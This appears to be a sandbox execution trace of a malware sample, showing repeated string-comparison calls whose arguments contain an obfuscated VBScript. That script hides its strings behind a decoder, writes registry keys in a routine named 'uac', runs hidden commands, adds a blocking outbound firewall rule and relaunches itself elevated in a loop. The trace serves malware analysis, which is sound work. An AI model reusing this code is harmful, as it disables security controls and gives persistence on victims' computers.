bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0223.018] wcsncmp (_String1="ewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.019] wcsncmp (_String1="wRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0223.019] wcsncmp (_String1="Rule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0223.019] wcsncmp (_String1="ule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0223.019] wcsncmp (_String1="le.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run 